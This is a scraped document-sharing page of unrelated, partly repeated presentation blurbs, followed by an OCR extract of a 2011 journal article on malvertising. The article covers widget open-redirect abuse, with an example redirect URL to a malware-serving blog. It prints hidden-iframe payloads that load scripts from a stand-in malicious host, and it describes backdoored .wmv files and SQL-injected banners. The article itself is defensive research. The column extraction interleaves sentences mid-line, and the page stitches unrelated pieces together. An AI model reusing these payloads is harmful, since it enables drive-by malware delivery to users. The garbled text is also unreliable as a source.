This document discusses the emerging issue of "malvertising", where malicious actors exploit online advertising to spread malware. Specifically:
1) Malicious agents redirect users who click on advertisements to malicious sites that serve malware, taking advantage of the natural redirection built into online advertising.
2) Search engines' ties to advertising help malicious agents, as users expect redirects from search results and are less likely to be suspicious.
3) With no verification of advertisement redirects, attackers can easily hijack sponsored links and drive-by downloads to distribute malware instead of sending traffic to legitimate sites as intended. While advertisers pay for ads, attackers exploit them to spread malware without authorization.
웹의 [자발성과 다양성] 대 [책임성과 신뢰성]을 부여할 수 있는 '기술과 정책'의 참여 모델에 관한 발표JM code group
2009년 06월 23일 오후 4시 KISDI자문회의 주제발표인
웹공간의 신뢰성 향상을 위한 기술적 방법과 정책적 모델을 하나의 그림으로 깔끔히 그려서 소셜한 공간 형성을 위한 기술적 과제와 정책적 하모나이즈를 위한 제안에서 최종 깔끔한 정리를 게으름으로 빠트리고 설명해가는 그 과정을 PT로 작성함
Leveraging Networks to Accelerate LearningMaya Townsend
To make the most of their learning initiatives, leaders must understand the power of informal workplace networks and know how to leverage them to drive organizational change.
More: http://partneringresources.com/making-organizational-networks-force-learning-innovation/
Defining the New State for Comprehensive Enterprise Security Using CSC Servic...Dana Gardner
Transcript of a BriefingsDirect podcast on the growing menace of cybercrime and what companies need to do to protect their intellectual property and their business.
웹의 [자발성과 다양성] 대 [책임성과 신뢰성]을 부여할 수 있는 '기술과 정책'의 참여 모델에 관한 발표JM code group
2009년 06월 23일 오후 4시 KISDI자문회의 주제발표인
웹공간의 신뢰성 향상을 위한 기술적 방법과 정책적 모델을 하나의 그림으로 깔끔히 그려서 소셜한 공간 형성을 위한 기술적 과제와 정책적 하모나이즈를 위한 제안에서 최종 깔끔한 정리를 게으름으로 빠트리고 설명해가는 그 과정을 PT로 작성함
Leveraging Networks to Accelerate LearningMaya Townsend
To make the most of their learning initiatives, leaders must understand the power of informal workplace networks and know how to leverage them to drive organizational change.
More: http://partneringresources.com/making-organizational-networks-force-learning-innovation/
Defining the New State for Comprehensive Enterprise Security Using CSC Servic...Dana Gardner
Transcript of a BriefingsDirect podcast on the growing menace of cybercrime and what companies need to do to protect their intellectual property and their business.
Web and mobile emergency networks to real-time information and geodata management.
Authors: DI LOLLI - LANFRANCO - LOMBARDO - RAPISARDI
VVF TAS Torino | Università di Torino | NatRisk | Open Resilience
Collaborative mapping is the crucial need in any rescue and relief operation. Our recent experience lead us to focus the research on the development of a unique platform [web and mobile] that allows different levels of geolocated information sharing, on a “user permissions” base [anonymus user, registered user level 1, ….]. Our approach is to use the solutions that are free and open [such as Google Maps, Google Earth, Google 3d, Ushahidi, OpenStreetMap, or Android apps for route tracking] and to develop a stable tool through the integration of diverse solutions ensuring a high level of sharing and collaboration among different players.
The impact of social media on how Whitehall works
Sourced from "A dragon's best friend" blog, UKGovCamp 2012 post (http://adragonsbestfriend.wordpress.com/2012/01/18/ukgovcamp-2012/)
Presented to Southern California Software Process Improvement Network, July 2011
As 'the cloud' becomes the mainstream platform for IT innovation, platform architects will combine smart devices, global networks, and application models inspired by Twitter and Facebook to let people do what they do best: to recognize what’s not normal, and either address the problem or pursue the opportunity.
The first decade of cloud computing decisively demonstrated that massively sharable/scalable systems can shrink operating costs and slash development delays, but the era of the Social Enterprise goes farther to turn the cloud model from a perceived challenge into a compelling avenue for IT innovations that need not compromise security or governance.
As organizations struggle to meet the demands of the global marketplace, a business intelligence competency center can provide the business with trustworthy, timely and actionable information.
There have been reports such as ‘there is high rate of web application vulnerability’ as well as a range of ways in which web hackers attack web applications. Since the discovery that web applications convey the best content to users, there have been attempts to determine ways in which these systems can be hacked into through defacing, damage and defrauding. As the culture of conveying information across the internet continues to gain ground, there are increasing cases of vulnerabilities of these sites to cyber criminals.
Web and mobile emergency networks to real-time information and geodata management.
Authors: DI LOLLI - LANFRANCO - LOMBARDO - RAPISARDI
VVF TAS Torino | Università di Torino | NatRisk | Open Resilience
Collaborative mapping is the crucial need in any rescue and relief operation. Our recent experience lead us to focus the research on the development of a unique platform [web and mobile] that allows different levels of geolocated information sharing, on a “user permissions” base [anonymus user, registered user level 1, ….]. Our approach is to use the solutions that are free and open [such as Google Maps, Google Earth, Google 3d, Ushahidi, OpenStreetMap, or Android apps for route tracking] and to develop a stable tool through the integration of diverse solutions ensuring a high level of sharing and collaboration among different players.
The impact of social media on how Whitehall works
Sourced from "A dragon's best friend" blog, UKGovCamp 2012 post (http://adragonsbestfriend.wordpress.com/2012/01/18/ukgovcamp-2012/)
Presented to Southern California Software Process Improvement Network, July 2011
As 'the cloud' becomes the mainstream platform for IT innovation, platform architects will combine smart devices, global networks, and application models inspired by Twitter and Facebook to let people do what they do best: to recognize what’s not normal, and either address the problem or pursue the opportunity.
The first decade of cloud computing decisively demonstrated that massively sharable/scalable systems can shrink operating costs and slash development delays, but the era of the Social Enterprise goes farther to turn the cloud model from a perceived challenge into a compelling avenue for IT innovations that need not compromise security or governance.
As organizations struggle to meet the demands of the global marketplace, a business intelligence competency center can provide the business with trustworthy, timely and actionable information.
There have been reports such as ‘there is high rate of web application vulnerability’ as well as a range of ways in which web hackers attack web applications. Since the discovery that web applications convey the best content to users, there have been attempts to determine ways in which these systems can be hacked into through defacing, damage and defrauding. As the culture of conveying information across the internet continues to gain ground, there are increasing cases of vulnerabilities of these sites to cyber criminals.
How Converged Access and Application Intelligence Let You Handle Complex Network Needs for Visibility, Protection and Productivity. Customers around the world frequently describe to me their visions of the arriving IT environment—an ecosystem that’s open, flexible, scalable and robust; that lets companies enhance their application intelligence, fortify security, and seize fast-arising business opportunities.
Accenture: Multichannel Attribution Dec 2012Brian Crotty
Anticipating consumers’ every move to conversion is essential to realizing a strong return on marketing investment (MROI), yet, pervasive methods for understanding consumer behaviors fall short in a multichannel environment.
In the digital world, channel savvy, highly mobile, multiple device-happy consumers are in control. While they move from one media channel to another—and from one device to another—companies across industries are struggling to keep pace.
Anticipating consumers’ every move to conversion—and measuring every interaction across every channel—is essential to realizing a strong MROI and to sustaining competitive differentiation. Yet, pervasive methods for understanding consumer behaviors fall short in a multichannel environment.
As such, various attribution models and approaches have emerged to help businesses better capture and analyze consumers’ purchase journeys across both offline and online channels. Though a singular approach for measuring consumer data has yet to emerge, multichannel attribution holds exciting promise.
December 6, 2012
Social Models and Innovation EcosystemsPeter Coffee
Keynote presentation to MIT's conference, "Democratizing Innovation," 23 February 2013 -- by Peter Coffee, VP & Head of Platform Research, salesforce.com inc.
Emerging Trends in Online Social Networks MalwareAditya K Sood
Emerging trends in Social Networks Malware.
Social networks, such as Facebook, Twitter, and others pose a grave
threat to the security and privacy of users. This presentation highlights malware infection strategies
used by attackers to infect social networking websites and addresses security from the user
perspectives—outlining effective, secure steps that can reduce the impact of malware infections
Enfilade: Tool to Detect Infections in MongoDB InstancesAditya K Sood
Attackers are targeting MongoDB instances for conducting nefarious operations on the Internet. The cybercriminals are targeting exposed MongoDB instances and trigger infections at scale to exfiltrate data, destruct data, and extort money via ransom.
Detecting Ransomware/Bot Infections in ElasticsearchAditya K Sood
Elasticsearch infections are rising exponentially. The adversaries are exploiting open and exposed Elasticsearch interfaces to trigger infections in the cloud and non-cloud deployments. During this talk, we will release a tool named "STRAFER" to detect potential infections in the Elasticsearch instances. The tool allows security researchers, penetration testers, and threat intelligence experts to detect compromised and infected Elasticsearch instances running malicious code. The tool also enables you to conduct efficient research in the field of malware targeting cloud databases.
BlackHat 2014 Briefings - Exploiting Fundamental Weaknesses in Botnet C&C Pan...Aditya K Sood
Bot herders deploy Command and Control (C&C) panels for commanding and collecting exfiltrated data from the infected hosts on the Internet. To protect C&C panels, bot herders deploy several built-in (software-centric) protection mechanisms to restrict direct access to these C&C panels. However, there exist fundamental mistakes in the design and deployment of these C&C panels that can be exploited to take complete control. This talk discusses about the methodology of launching reverse attacks on the centralized C&C panels to derive intelligence that can be used to build automated solutions. This research reveals how to detect vulnerabilities and configuration flaws in the remote C&C panels and exploit them by following the path of penetration testing. This talk is derived from the real time research in which several C&C panels were targeted and intelligence was gathered to attack the next set of C&C panels. A number of case studies will be discussed to elaborate step-by-step process of attacking and compromising C&C panels. This talk also demonstrates the use of automated tools authored for making the testing easier for the researchers.
DOWNLOAD from this link : http://secniche.org/blackhat-2014/
BlackHat Arsenal 2014 - C-SCAD : Assessing Security Flaws in C-SCAD WebX Clie...Aditya K Sood
C-SCAD is an information gathering and penetration testing tool written to assess the security issues present in the Web-X (Internet Explorer-based web interface) client used to interact with the ClearSCADA server. WebX client is hosted on the embedded web server which is shipped as a part of complete ClearSCADA architecture. Primarily, the WebX client is restricted to perform any configuration changes but it can reveal potential information about the ClearSCADA server and associated components. Insecure deployments of WebX client can reveal potential information about the various functions such as alarm pages, SQL lists, and diagnostic checks including various reports.
In this article, we discuss the design of an iframe injector used to infect web-hosting software such as cPanel in an automated manner. Several different iframe injector designs exist, but we look at one of the most basic: NiFramer.
CrossTalk - The Art of Cyber Bank Robbery - Stealing your Money Through Insid...Aditya K Sood
Cyber criminals are using advanced attacks to exploit online banking systems and services to covertly steal money. This paper describes the tactics currently used by cyber criminals to conduct cyber bank robbery
ToorCon 14 : Malandroid : The Crux of Android InfectionsAditya K Sood
The Android platform has been plagued by malware for the past several years. Despite all attempts to detect and mitigate malicious applications on Android, malware is still flying under our radar and getting on our devices and causing millions of users financial and data loss every year. Additionally, the malware analysis community is at a large disagreement on how Android malware should be classified. In this talk, we’ll dive into the tactics, tools and procedures used by Android malware today, including several case studies of exceptional malware samples. By analyzing real code used by malware in the wild, we’ll be able to show the advancements in Android malware from a design perspective.
GDG Cloud Southlake #33: Boule & Rebala: Effective AppSec in SDLC using Deplo...James Anderson
Effective Application Security in Software Delivery lifecycle using Deployment Firewall and DBOM
The modern software delivery process (or the CI/CD process) includes many tools, distributed teams, open-source code, and cloud platforms. Constant focus on speed to release software to market, along with the traditional slow and manual security checks has caused gaps in continuous security as an important piece in the software supply chain. Today organizations feel more susceptible to external and internal cyber threats due to the vast attack surface in their applications supply chain and the lack of end-to-end governance and risk management.
The software team must secure its software delivery process to avoid vulnerability and security breaches. This needs to be achieved with existing tool chains and without extensive rework of the delivery processes. This talk will present strategies and techniques for providing visibility into the true risk of the existing vulnerabilities, preventing the introduction of security issues in the software, resolving vulnerabilities in production environments quickly, and capturing the deployment bill of materials (DBOM).
Speakers:
Bob Boule
Robert Boule is a technology enthusiast with PASSION for technology and making things work along with a knack for helping others understand how things work. He comes with around 20 years of solution engineering experience in application security, software continuous delivery, and SaaS platforms. He is known for his dynamic presentations in CI/CD and application security integrated in software delivery lifecycle.
Gopinath Rebala
Gopinath Rebala is the CTO of OpsMx, where he has overall responsibility for the machine learning and data processing architectures for Secure Software Delivery. Gopi also has a strong connection with our customers, leading design and architecture for strategic implementations. Gopi is a frequent speaker and well-known leader in continuous delivery and integrating security into software delivery.
Why You Should Replace Windows 11 with Nitrux Linux 3.5.0 for enhanced perfor...SOFTTECHHUB
The choice of an operating system plays a pivotal role in shaping our computing experience. For decades, Microsoft's Windows has dominated the market, offering a familiar and widely adopted platform for personal and professional use. However, as technological advancements continue to push the boundaries of innovation, alternative operating systems have emerged, challenging the status quo and offering users a fresh perspective on computing.
One such alternative that has garnered significant attention and acclaim is Nitrux Linux 3.5.0, a sleek, powerful, and user-friendly Linux distribution that promises to redefine the way we interact with our devices. With its focus on performance, security, and customization, Nitrux Linux presents a compelling case for those seeking to break free from the constraints of proprietary software and embrace the freedom and flexibility of open-source computing.
Threats to mobile devices are more prevalent and increasing in scope and complexity. Users of mobile devices desire to take full advantage of the features
available on those devices, but many of the features provide convenience and capability but sacrifice security. This best practices guide outlines steps the users can take to better protect personal devices and information.
GraphSummit Singapore | The Art of the Possible with Graph - Q2 2024Neo4j
Neha Bajwa, Vice President of Product Marketing, Neo4j
Join us as we explore breakthrough innovations enabled by interconnected data and AI. Discover firsthand how organizations use relationships in data to uncover contextual insights and solve our most pressing challenges – from optimizing supply chains, detecting fraud, and improving customer experiences to accelerating drug discoveries.
PHP Frameworks: I want to break free (IPC Berlin 2024)Ralf Eggert
In this presentation, we examine the challenges and limitations of relying too heavily on PHP frameworks in web development. We discuss the history of PHP and its frameworks to understand how this dependence has evolved. The focus will be on providing concrete tips and strategies to reduce reliance on these frameworks, based on real-world examples and practical considerations. The goal is to equip developers with the skills and knowledge to create more flexible and future-proof web applications. We'll explore the importance of maintaining autonomy in a rapidly changing tech landscape and how to make informed decisions in PHP development.
This talk is aimed at encouraging a more independent approach to using PHP frameworks, moving towards a more flexible and future-proof approach to PHP development.
SAP Sapphire 2024 - ASUG301 building better apps with SAP Fiori.pdfPeter Spielvogel
Building better applications for business users with SAP Fiori.
• What is SAP Fiori and why it matters to you
• How a better user experience drives measurable business benefits
• How to get started with SAP Fiori today
• How SAP Fiori elements accelerates application development
• How SAP Build Code includes SAP Fiori tools and other generative artificial intelligence capabilities
• How SAP Fiori paves the way for using AI in SAP apps
LF Energy Webinar: Electrical Grid Modelling and Simulation Through PowSyBl -...DanBrown980551
Do you want to learn how to model and simulate an electrical network from scratch in under an hour?
Then welcome to this PowSyBl workshop, hosted by Rte, the French Transmission System Operator (TSO)!
During the webinar, you will discover the PowSyBl ecosystem as well as handle and study an electrical network through an interactive Python notebook.
PowSyBl is an open source project hosted by LF Energy, which offers a comprehensive set of features for electrical grid modelling and simulation. Among other advanced features, PowSyBl provides:
- A fully editable and extendable library for grid component modelling;
- Visualization tools to display your network;
- Grid simulation tools, such as power flows, security analyses (with or without remedial actions) and sensitivity analyses;
The framework is mostly written in Java, with a Python binding so that Python developers can access PowSyBl functionalities as well.
What you will learn during the webinar:
- For beginners: discover PowSyBl's functionalities through a quick general presentation and the notebook, without needing any expert coding skills;
- For advanced developers: master the skills to efficiently apply PowSyBl functionalities to your real-world scenarios.
Removing Uninteresting Bytes in Software FuzzingAftab Hussain
Imagine a world where software fuzzing, the process of mutating bytes in test seeds to uncover hidden and erroneous program behaviors, becomes faster and more effective. A lot depends on the initial seeds, which can significantly dictate the trajectory of a fuzzing campaign, particularly in terms of how long it takes to uncover interesting behaviour in your code. We introduce DIAR, a technique designed to speedup fuzzing campaigns by pinpointing and eliminating those uninteresting bytes in the seeds. Picture this: instead of wasting valuable resources on meaningless mutations in large, bloated seeds, DIAR removes the unnecessary bytes, streamlining the entire process.
In this work, we equipped AFL, a popular fuzzer, with DIAR and examined two critical Linux libraries -- Libxml's xmllint, a tool for parsing xml documents, and Binutil's readelf, an essential debugging and security analysis command-line tool used to display detailed information about ELF (Executable and Linkable Format). Our preliminary results show that AFL+DIAR does not only discover new paths more quickly but also achieves higher coverage overall. This work thus showcases how starting with lean and optimized seeds can lead to faster, more comprehensive fuzzing campaigns -- and DIAR helps you find such seeds.
- These are slides of the talk given at IEEE International Conference on Software Testing Verification and Validation Workshop, ICSTW 2022.
Transcript: Selling digital books in 2024: Insights from industry leaders - T...BookNet Canada
The publishing industry has been selling digital audiobooks and ebooks for over a decade and has found its groove. What’s changed? What has stayed the same? Where do we go from here? Join a group of leading sales peers from across the industry for a conversation about the lessons learned since the popularization of digital books, best practices, digital book supply chain management, and more.
Link to video recording: https://bnctechforum.ca/sessions/selling-digital-books-in-2024-insights-from-industry-leaders/
Presented by BookNet Canada on May 28, 2024, with support from the Department of Canadian Heritage.
UiPath Test Automation using UiPath Test Suite series, part 4DianaGray10
Welcome to UiPath Test Automation using UiPath Test Suite series part 4. In this session, we will cover Test Manager overview along with SAP heatmap.
The UiPath Test Manager overview with SAP heatmap webinar offers a concise yet comprehensive exploration of the role of a Test Manager within SAP environments, coupled with the utilization of heatmaps for effective testing strategies.
Participants will gain insights into the responsibilities, challenges, and best practices associated with test management in SAP projects. Additionally, the webinar delves into the significance of heatmaps as a visual aid for identifying testing priorities, areas of risk, and resource allocation within SAP landscapes. Through this session, attendees can expect to enhance their understanding of test management principles while learning practical approaches to optimize testing processes in SAP environments using heatmap visualization techniques
What will you get from this session?
1. Insights into SAP testing best practices
2. Heatmap utilization for testing
3. Optimization of testing processes
4. Demo
Topics covered:
Execution from the test manager
Orchestrator execution result
Defect reporting
SAP heatmap example with demo
Speaker:
Deepak Rai, Automation Practice Lead, Boundaryless Group and UiPath MVP
Sudheer Mechineni, Head of Application Frameworks, Standard Chartered Bank
Discover how Standard Chartered Bank harnessed the power of Neo4j to transform complex data access challenges into a dynamic, scalable graph database solution. This keynote will cover their journey from initial adoption to deploying a fully automated, enterprise-grade causal cluster, highlighting key strategies for modelling organisational changes and ensuring robust disaster recovery. Learn how these innovations have not only enhanced Standard Chartered Bank’s data infrastructure but also positioned them as pioneers in the banking sector’s adoption of graph technology.
Pushing the limits of ePRTC: 100ns holdover for 100 daysAdtran
At WSTS 2024, Alon Stern explored the topic of parametric holdover and explained how recent research findings can be implemented in real-world PNT networks to achieve 100 nanoseconds of accuracy for up to 100 days.
Pushing the limits of ePRTC: 100ns holdover for 100 days
Malvertising - Exploiting Web Advertising | Elsevier Computer Fraud and Security Journal
1. FEATURE
which he describes as “a bit basic”, will purposes by commandeering more than The next step will be to host an ongo-
make in and of themselves. While he says 21,000 computers around the world. ing series of workshops over the next 12
that the “unification of views” from dis- Carolina canvassed the opinions of a months or so and to circulate reports
parate industry bodies can only be a good number of information security prac- based on the outcomes to members of the
thing, he points out that their value to the titioners as to whether they considered working group, although other individu-
industry is likely to remain limited “until the move right or wrong. The responses, als will be invited to join as appropriate.
and unless businesses [rather than individual which ranged from “it’s absolutely appall- “If this gains traction and popular sup-
practitioners] are made fully aware of their ing and law enforcement should throw port, we might be able to start abstracting
existence and accept and embrace them”. the book at them” to “they deserve to get out basic principles to describe what ethical
“It’s a good starting point if only for an award” – which, incidentally, they later practices are and maybe write them down as
debate such as this,” he says, “but it will did – prompted him to explore what ethi- a rule set,” Carolina says. “But if we do that,
be interesting to see the status of the cal guidance was currently available, most it will only be published with highlighted
principles in a year’s time.” of which he found unhelpful. case studies as you have to have examples
As a result, as of early February this and context. In my professional opinion,
Ethics project year, Carolina kicked off the first in a without that, it’s not much value.”
series of ethics workshops, made up of While such initiatives are, unfortu-
Meanwhile, another potential step on no more than 25 IISP members. “This is nately, still rather fragmented in nature,
the road to professionalisation is the an area where people are crying out for what they would appear to suggest is
creation of an initiative entitled the guidance, especially in the private sector,” that the information security industry is
Information Security Ethics Project, he says. “We want practitioners to have slowly starting to move down the path
which is sponsored by and housed better information so that they feel less of becoming more professionalised.
within the UK’s Institute of Information exposed and better informed to make As Gillespie concludes: “Things are
Security Professionals (IISP). hard decisions.” changing. There are lots of pockets of
The idea behind the project came work being done and, while they’re
from the Institute’s general counsel, Things are changing not consistent or global, you can see a
Robert Carolina, who is also a sen- day when the industry will get there –
ior visiting fellow at Royal Holloway The half-day discussion centred on a series although it’s a long road yet.”
University’s information security group, of hypothetical case studies that were
where he teaches in its information secu- used to debate the right and wrong ways
About the author
rity MSc programme. to respond in each scenario and, most Cath Everett is a freelance journalist who
In early 2009, Carolina wrote an article importantly, why. The aim was to look for has been writing about business and tech-
for Computer Weekly about the legal- points of commonality and difference in nology issues since 1992. Her special areas
ity – or otherwise – of the actions of the individuals’ beliefs and approaches and to of focus include information security, HR/
BBC’s Click TV programme team when use those areas where opinion diverged as management and skills issues, marketing
it created its own botnet for educational the basis for further discussion. and high-end software.
Malvertising – exploiting
web advertising
Aditya K Sood, Richard J Enbody, Michigan State University
Online advertisements provide a convenient platform for spreading malware.
Since ads provide a significant portion of revenue on the web, significant effort can be redirected. Of particular use to
is put into attracting users to them. Malicious agents take advantage of this malicious agents is that redirection is
skillful attraction and then redirect users to malicious sites that serve malware. built into online advertising so the mali-
cious user only needs to co-opt a redirec-
Search engines’ intimate tie-in with significant effort goes into attracting tion that is taking place. As a bonus, the
advertising also assists malicious agents: users to particular sites from which users user expects a redirection to take place, so
11
April 2011 Computer Fraud & Security
2. FEATURE
order to redirect traffic from malver-
tisements that are distributed across
the World Wide Web. When a user
clicks on a malvertisement, the traf-
fic is redirected towards a malicious
domain rather the legitimate one.
• Generally, no verification check can
be imposed on advertisements to
detect whether the redirect occurs
appropriately or not. This lack of
verification results from the nature of
the web-advertising model that makes
it difficult for a publisher to scrutinise
web traffic related to ad delivery.
• Attackers can also tamper with spon-
sored links to distribute malicious
executables directly into the system as
a part of drive-by-download infection.
Internet Explorer has been a popular
target because of both its popularity
and its ability to run custom exploits
through ActiveX controls [8].
The irony is that advertisers pay the
publishers for the advertisements while
the attackers exploit those same ads to
spread malware.
Malvertising modes
Most of the web malware is triggered
through web injections to exploit the vul-
nerabilities in web software and domains.
Figure 1: Registering a widget on a vulnerable advertising domain. Different modes of infections are used
for injecting malicious advertisements
the redirection to a malicious site is less it is hard to determine the integrity of in vulnerable domains. To appreciate
of a red flag. content that is shared among different the severity and prevalence of this class
Another feature of online advertis- domains across the web. of attack, the Open Web Application
ing that can be co-opted by malicious The result is that online marketing has Security Project (OWASP) recently placed
agents is the dynamic delivery of ads. A opened up new avenues for profit gen- invalidated redirects and forwards in its
standard approach is to provide HTML eration while at the same time providing 2010 ‘top 10’ list.2
code snippets that are used in conjunc- a convenient platform for malware deliv-
tion with normal websites in order to ery. Malvertising growth is being assisted Malvertising with
embed advertisements. For example, by the following:
Doubleclick.net provides millions of ads • Malicious agents can register nearly
malicious widgets
that are served to different domains as any domain and can use it as a stor- and redirection
dynamic content – that is, the content of age base for malware in order to con- The advent of Web 2.0 popularised
advertisements can change dynamically duct drive-by-download attacks by widgets for use in advertising and traffic
based on user or content characteristics. redirecting users to their malicious redirection.3 However, flaws in the design
Service Level Agreements (SLA) exist domains.1 Generally, these types of of some web widgets pose high risks to
between ad distributor and website to domains do not comply with any domains using those widgets for advertis-
define appropriate content, but they are types of security or privacy standards. ing.4 As mentioned above, the redirection
neither designed for nor appropriate for • Malicious agents can use different can be co-opted by malicious users to
applying effective security. In particular, modes of malvertising infections in redirect traffic to malicious sites.
12
Computer Fraud & Security April 2011
3. FEATURE
For example, we detected a widget vulner-
ability in a popular news publisher web-
site. The normal procedure is for a user
to register, which allows the publisher to
render news from various popular chan-
nels and embed them into the user’s web-
sites and blogs. However, because of flaws
in the publisher’s system, it’s possible to
redirect traffic.
In order to install the widget, the pub-
lishing domain requires certain steps to
be performed by a user to facilitate the
ability of the widget to include third-
party content. Specifically:
• The widget can only be installed after
Figure 2: Installed widget.
registration. The user selects the wid-
get code based on the target platform
– such as blogger, MySpace etc – in the vulnerable publishing domain as HTTP specification includes the iframe
which the widget is to be installed. follows, where ‘outbrain.com’ is a vulner- to embed one web page into another.
• Once the registration is complete, the able advertising domain and ‘xsstesting- Iframes can be used to load dynamic
publisher requires the user to log in blog’ is a blog that serves malware: content for advertising. This functional-
to his or her website or blog so that ity of iframes can be exploited to trigger
widget installation can be completed. http://outbrain.com/most-viewed. infections. Iframes are used extensively
After installation, the publisher starts action?sourceUrl=http://www. in order to bypass Same Origin Policy
sending news and advertisements to xsstestingblog.blogspot.com (SOP) and launch a Cross Domain
the registered user website. Attack (CDA).5,6 Attackers can easily
• After the widget is embedded in the Step 3: Users who go to the widget embed hidden iframes that serve mal-
user’s site, the user is able to receive thinking that they are entering the pub- vertisements in order to spread malware
random content from various content lisher’s site find themselves redirected to while interacting with legitimate users.
providers through a vulnerable adver- the attacker’s site. A successful attack can Usually, iframes are exploited using the
tising domain that acts as an interme- be seen as a response request mechanism following procedures for running mali-
diate service provider. in Figure 3. cious code:
For advertising purposes, the vulner- This attack is the outcome of a design 1. Scripts in iframes are allowed to execute
able publishing domain uses redirec- bug in the widget implementation. in the context of the browser process (the
tion links in order to advertise on the Attackers can exploit this scenario by more powerful the context, the greater
publisher’s website. However, web traffic generating malicious advertisements the vulnerability that can be exploited).
can be easily redirected from where the (using the publisher’s name) that are 2. There is no specific security restriction
widget is installed to any domain. This embedded with redirected URLs which on Active X object usage.
shows that inclusion of the widget in exploit the design bug in the vulner- 3. Browser redirection can be done easily
any random domain can result in traffic able publishing domain in order to through iframes.
redirection from a vulnerable publisher’s execute redirection towards the malicious 4. Access to local objects is not restricted
website through advertising links. The domain. This shows how a vulnerable completely.
attacker can exploit this scenario by per- advertising widget can be subverted by The hidden iframes used for malvertis-
forming three steps: an attacker. ing are constructed as follows:
Step 1: The attacker registers as a
legitimate user (in order to get a widget <iframe src=“http://www.malicious.com/
for inclusion in some domain) as shown mal_ad.js “ width=1 height=1 style=“visibi
in Figure 1. The widget is included in Hidden iframes are one way for attack- lity:hidden;position:absolute”></iframe>
the same domain as shown in Figure 2. ers to hide the objects that are used
Step 2: The attacker can activate the for spreading malware. The concept <iframe src=“http://www.malicious.com/
apparently dead vulnerability through of hidden infection is not new, but software_ad.js” width=0 height=0></
hyperlinks by activating the URL from here we show a different variation. The iframe>
13
April 2011 Computer Fraud & Security
4. FEATURE
Player files and Javascript extensively.
However, this is a grave concern because if
a CDN server is exploited, the attacker can
inject malicious code in the form of mal-
vertisements and that code is widely dis-
tributed. There is a chain reaction because
if a parent server is infected, the child
nodes will automatically get infected, too.
Corrupting a server that serves thousands
of sites spreads the malvertisements broadly
and often in a trusted manner.
We have identified Windows Media
Player files being used in malvertising
Figure 3: Victim browser successfully gets redirected to the malware domain. for spreading malware. An attacker can
perform the following steps in order to
In addition, attackers can hide their for inline infections so that the detection design and inject malicious .wmv files as
malicious purpose using Javascript process becomes harder. malvertisements:
obfuscation techniques to encode the Step 1: The attacker ‘backdoors’ the
malicious links. Iframes possess a default Malvertising through .wmv file using Windows Script Editor,
inherited flaw of defining a trust rela- with malicious code (as presented in
tionship between different domains that
infected Content Figure 4) that executes through Cross
are communicating with each other. The Delivery Networks Site Scripting (XSS) attacks.
trust relationship cannot be determined A Content Delivery Network (CDN) Step 2: The attacker injects this .wmv
every time within different domains that is a third-party ad server that provides file in an iframe and injects the code in
are sharing content. content to different domains across the a vulnerable CDN domain. When this
The inability to precisely determine web. CDNs are the preferred choice for file is distributed across domains, it starts
trust is why it is very hard to restrict the attackers to spread malware by exploiting spreading the malicious XSS file and
content present in iframes and why it the CDN web servers – the attackers can bypasses the Internet Explorer XSS filter
is executed in the context of the parent simply let the servers assist in spreading as shown in Figure 5.
website. Attackers load malvertisements the malware. Advertisements use Flash, As you can see, CDNs have the poten-
in iframes to run in the parent domain Silverlight, pop-ups, Windows Media tial to be a big problem with respect to
web malware.
Malvertising through
malicious banners
Advertising banners are used exten-
sively in order to spread infections.7
Primarily, attackers exploit servers that
host a number of websites on a single
server – a common scenario. As above,
attacking servers is an easy way to infect
a large number of websites. In addition,
since advertising banners are widespread,
an attack through them will also be
widespread. In this attack, the attackers
exploit an XSS flaw or SQL injection
vulnerability in websites hosted on the
server in order to take full control. The
attacker then uses two specific tech-
Figure 4: Designing a .wmv file backdoor.
niques to infect websites with malicious
banners as follows:
14
Computer Fraud & Security April 2011
5. FEATURE
• Attackers update the database with
malicious iframes by exploiting SQL
injections in order to trigger persistent
infections.
• Attackers compromise the shared
hosting server and use automated
scripts to render malicious code on
the main web page of different hosts.
When a user visits a specific website,
malicious banners are displayed along
with dynamic content. Click on the ban-
ner and the user is infected, or simply dis-
playing the banner can lead to infection.
Figure 5: WMV file is spreading malicious VbScript file.
This trick can be used in conjunc-
tion with SEO poisoning in which an
attacker coerces a search engine to visit are becoming one of the main sources of pending on hardware buffer-overflow pro-
malicious domains or hijacked websites spreading web malware. One reason for tection, which will prevent most computer
that display malicious banners. their popularity is a dearth of appropri- worms and viruses. He recently co-authored
ate security procedures for content shar- a CS1 Python book, The Practice of
Solutions ing. For example, merely signing an SLA Computing using Python.
does not ensure security and integrity
• The design of web applications and in a shared network. There is a pressing
Resources
widgets should be thoroughly veri- need for rigorous security policies and • Polychronakis, Michalis;
fied before allowing their use in a procedures to curb the risk of this type Mavrommatis, Panayiotis; Provos,
production environment. The widget of infection. History indicates that it is Niels. ‘Ghost Turns Zombie:
should be installed with appropriate impossible to get rid of malware infec- Exploring the Life Cycle of Web-
access controls in order to avoid any tions completely, but continuous efforts based Malware’. Accessed Mar 2011.
rogue actions. can contribute towards enhancing the <http://www.usenix.org/event/leet08/
• The interface communication chan- security of our networks. tech/full_papers/polychronakis/poly-
nel between an installed widget and chronakis.pdf>.
a parent website should be moni-
About the authors • Provos, Niels; McNamee, Dean;
tored to catch the traffic redirection. Aditya K Sood is a security researcher, con- Mavrommatis, Panayiotis; Wang, Ke;
Generally, the main website should sultant and PhD candidate at Michigan Modadugu, Nagendra. ‘The Ghost in
not allow redirection in an open man- State University. He has worked in the the Browser: Analysis of Web-based
ner without restricted control. security domain for Armorize, COSEINC Malware’. Accessed Mar 2011. <http://
• Appropriate configuration should be and KPMG and founded SecNiche Security. www.usenix.org/event/hotbots07/tech/
used in shared hosting environments. He has been an active speaker at confer- full_papers/provos/provos.pdf>.
The servers should be audited regularly ences such as RSA, Toorcon, Hacker Halted, • Ford, Sean; Cova, Marco; Kreugel,
in order to detect any vulnerable hosts. TRISC, EuSecwest, XCON, OWASP Christopher; Vigna, Giovanni.
• A live malware monitoring system AppSec, CERT-IN and has written content ‘Analyzing and Detecting Malicious
should be used for dedicated and for HITB Ezine, ISSA, ISACA, Elsevier, Flash Advertisements’. Accessed Mar
shared hosting servers in order to trace Hakin9 and Usenix Login. 2011. <http://www.cs.ucsb.edu/~chris/
malware infections at inception. research/doc/acsac09_flash.pdf>.
• Systems should be updated with the Dr Richard Enbody is an Associate Professor • ‘Some 1.3 million malicious ads
latest software and patches. in the Department of Computer Science and served daily’. SC Magazine, 18 May
Engineering, Michigan State University. 2010. Accessed Mar 2011. <http://
Conclusion He joined the faculty in 1987 after earn- www.scmagazineus.com/report-some-
ing his PhD in Computer Science from 13-million-malicious-ads-served-
We’ve covered the essential dynamics the University of Minnesota. His research daily/article/170414/>.
